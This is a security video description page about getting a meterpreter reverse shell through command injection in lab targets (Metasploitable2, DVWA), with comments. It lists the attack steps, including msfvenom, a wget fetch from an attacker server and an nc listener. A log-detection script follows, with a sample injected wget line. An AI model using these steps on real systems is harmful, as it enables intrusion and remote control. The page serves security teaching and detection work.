Description: This video is part of the Hack of the Day series on SecurityTube. You can watch older videos using this link: http://securitytube.net/tags/hod
In this video, we look at a standard Command Injection vulnerability in a web application and see how we can get a meterpreter shell on the box. The approach is similar to how you would upload and get a web shell on a box. Here are the steps:
1. Create a php file using msfvenom and the php/meterpreter/reverse_tcp payload
2. Remove the guard '#' from the php file
3. Serve the file using a webserver - I use python -m SimpleHTTPServer
4. In the command injection vulnerable form element, use wget to fetch the php file from the attacker server
5. Verify the file has been uploaded
6. Create an exploit/multi/handler for the payload
7. Run the php meterpreter script on the vulnerable server by referencing it directly via a URL
If all goes well, you should have a meterpreter on the box :)
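A defender-side check for the sequence in steps 4 and 7, added here as an example (not from the video or its author): it scans web access logs for a parameter value that chains a wget/curl download, then for a later request to the file that was fetched. The log lines, the `lookup.php` path and the `host` parameter are constructed, and it assumes the vulnerable parameter is visible in the logged query string.

```python
import re
from posixpath import basename
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in common log format (documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2013:13:55:36 +0000] "GET /app/lookup.php?host=example.org HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2013:13:56:02 +0000] "GET /app/lookup.php?host=example.org%3B+wget+http%3A%2F%2F198.51.100.7%3A8000%2Fs.php HTTP/1.1" 200 498
203.0.113.5 - - [10/Oct/2013:13:56:40 +0000] "GET /app/s.php HTTP/1.1" 200 0
192.0.2.44 - - [10/Oct/2013:13:57:01 +0000] "GET /app/index.php HTTP/1.1" 200 2301
"""

# Client IP and request target from one log line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3}')
# A shell separator, then a download tool, then a URL, all inside one value.
FETCH_RE = re.compile(
    r'(?:[;|&`\n]|\$\()\s*(?:wget|curl)\b[^;|&`]*?(https?://[^\s;|&`]+)', re.I)


def find_injected_fetches(log_text):
    """Return (line, ip, kind, detail) for injected downloads and follow-up hits."""
    findings = []
    fetched = {}  # file name -> line number of the injected download
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        name = basename(url.path)
        # A request for a file that an earlier injected download fetched.
        if name and name in fetched:
            findings.append((n, ip, "fetched-file-requested", name))
        # parse_qsl URL-decodes each value before the pattern is applied.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            hit = FETCH_RE.search(value)
            if hit:
                dropped = basename(urlsplit(hit.group(1)).path)
                if dropped:
                    fetched.setdefault(dropped, n)
                findings.append((n, ip, "injected-download",
                                 f"{key} -> {hit.group(1)}"))
    return findings


if __name__ == "__main__":
    for finding in find_injected_fetches(SAMPLE_LOG):
        print(finding)
```

If the form submits by POST, the same correlation has to run over a source that records request bodies, such as a WAF or audit log.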
Questions: 1. Can someone create a quick demo of DVWA using the same principle?
2. In the video "getuid" gave us "www-data". Is privilege escalation possible? How?
Tags: hod, web-attacks, command injection, php meterpreter, metasploitable2, dvwa
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
I guess privilege escalation is only possible:
1. If the current Apache has a local root vulnerability.
2. If getuid is changed to account-user and then exploiting any local root available for the server.
Can you point me to a demo where someone has done this with Metasploitable 2? It's a freely available download so I guess anyone can try and post a video or a blogpost or at least a bunch of screenshots :)
Looking forward to someone solving this :)
11 Years Back -> http://packetstormsecurity.com/files/30537/scalpel.c.html
I meant someone to try this with Metasploitable 2 and post a video / blog link :) Getting a PoC code to work for a particular scenario may not be as easy as it seems :)
Done With DVWA Video ... Uploading Link Here Shortly :-)
http://www.youtube.com/watch?v=TCGVvnWFlzA
DVWA Challenge Solved :-)
I think this was creative!
I like this video, but can you please make a video on php\download_exec? Thanks in advance for making this video.
DVWA Challenge Solved by Security is just an Illusion
http://www.youtube.com/watch?feature=player_embedded&v=9fXnvakEX9g
The same exploit can be done using any malicious web shell like weevely and Webacoo.
I have a demo on that; if anyone is interested, please let me know.
One more thing: this can be done using nc -lvp 4444 and browsing the URL of the malicious php file.